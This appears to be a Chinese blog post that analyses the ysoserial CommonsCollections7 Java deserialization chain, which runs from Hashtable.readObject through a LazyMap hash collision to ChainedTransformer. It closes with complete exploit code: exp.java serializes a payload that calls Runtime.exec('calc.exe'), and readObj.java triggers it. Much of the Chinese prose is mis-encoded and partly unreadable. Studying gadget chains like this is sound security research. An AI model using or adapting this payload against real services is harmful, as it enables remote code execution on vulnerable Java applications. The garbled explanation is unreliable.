前言:
CommonsCollections7外層也是一條新的構(gòu)造鏈,外層由hashtable的readObject進(jìn)入,這條構(gòu)造鏈挺有意思�,因?yàn)橛玫搅薶ash碰撞
yso構(gòu)造分析:
首先構(gòu)造進(jìn)行rce所需要的轉(zhuǎn)換鏈���,這里也用的是chianed里面套Constantrans+invoketrans的方法
接著構(gòu)造兩個(gè)hashmap�����,通過lazymap的decorate用chained進(jìn)行裝飾后放進(jìn)hashTable���,這兩個(gè)lazymap放進(jìn)去的值也比較有講究��,要求計(jì)算出來的lazymap的hash相同
因?yàn)檫@里hashtable放進(jìn)第二個(gè)lazymap時(shí)�����,因?yàn)閮蓚€(gè)lazymap的hash相同��,所以將把第一個(gè)lazymap的key值yy放到第二個(gè)lazymap中(首先lazymap.get('yy’)嘗試從第二個(gè)lazymap中拿)���,此時(shí)將導(dǎo)致lazymap2中新添加yy->processImpl鍵值對(duì)
為了讓后面調(diào)用鏈時(shí)發(fā)生hash碰撞���,所以這里要移除該鍵值對(duì),為什么移除在后面調(diào)用鏈進(jìn)行一個(gè)解釋
調(diào)用鏈分析:
首先反序列化讀出key和value�,此時(shí)讀出的key為lazymap���,將重新裝進(jìn)hashtable中,這里調(diào)用reconstitutionPut��,將會(huì)對(duì)key算一個(gè)hash和一個(gè)table的索引值��,此時(shí)要判斷是否該索引值處是否已經(jīng)有元素�����,此時(shí)要判斷已經(jīng)放進(jìn)的第一個(gè)lazymap的hash和當(dāng)前key的hash是否相同���,那么此時(shí)取出來的entry的key即為第一個(gè)lazymap��,兩個(gè)hash值是相同的,即
e.hash==hash,所以進(jìn)入第二個(gè)判斷兩個(gè)lazymap是否完全相同
此時(shí)將調(diào)用AbstractMap的equals方法����,入口參數(shù)值即為要放入的lazymap
此時(shí)將首先判斷一下兩個(gè)lazymap的大小一樣不一樣�����,因?yàn)橹皹?gòu)造payload的時(shí)候已經(jīng)移除了第二個(gè)lazymap中yy->yy鍵值對(duì)�,因此此時(shí)兩個(gè)lazymap的空間大小一致都為1
此時(shí)遍歷該map,首先將取出第一個(gè)lazymap中key和value為yy->1,如果value為null�,則如果從第二個(gè)lazymap中取出該key的value不為null并且第二個(gè)lazymap包含該key,則判斷兩個(gè)lazymap不一樣����,但是這里value不為null,因此進(jìn)入else判斷�����,即判斷兩個(gè)lazymap的value是否相同���,此時(shí)調(diào)用第二個(gè)lazymap的get函數(shù)�����,key即為yy
那么調(diào)用了lazymap.get�����,就又回到了我們之前的套路了,調(diào)用this.factory.transform
此時(shí)接著就是調(diào)用chainedtransformer的transform進(jìn)行rce了
手動(dòng)exp構(gòu)造:
exp.java
package CommonsCollections7;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;
public class exp {
public static void main(String[] args) throws IOException {
Transformer[] trans = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class,Class[].class},
new Object[]{"getRuntime",new Class[0]}),
new InvokerTransformer("invoke",
new Class[]{Object.class,Object[].class},
new Object[]{null,null}
),
new InvokerTransformer("exec",
new Class[]{String.class},
new Object[]{"calc.exe"})
};
ChainedTransformer chain = new ChainedTransformer(trans);
//構(gòu)造兩個(gè)hash值相同的lazymap
Map innerMap1 = new HashMap();
Map innerMap2 = new HashMap();
Map lazyMap1 = LazyMap.decorate(innerMap1,chain);
lazyMap1.put("yy",1);
Map lazyMap2 = LazyMap.decorate(innerMap2, chain);
lazyMap2.put("zZ",1);
Hashtable hashTable = new Hashtable();
hashTable.put(lazyMap1,1);
hashTable.put(lazyMap2,2);
lazyMap2.remove("yy");
//序列化
File file;
file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections7.ser");
ObjectOutputStream obj = new ObjectOutputStream(new FileOutputStream(file));
obj.writeObject(hashTable);
}
}
readObj.java
package CommonsCollections7;
import java.io.*;
public class readObj {
public static void main(String[] args) throws IOException, ClassNotFoundException {
File file;
file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections7.ser");
ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file));
obj.readObject();
}
}
|
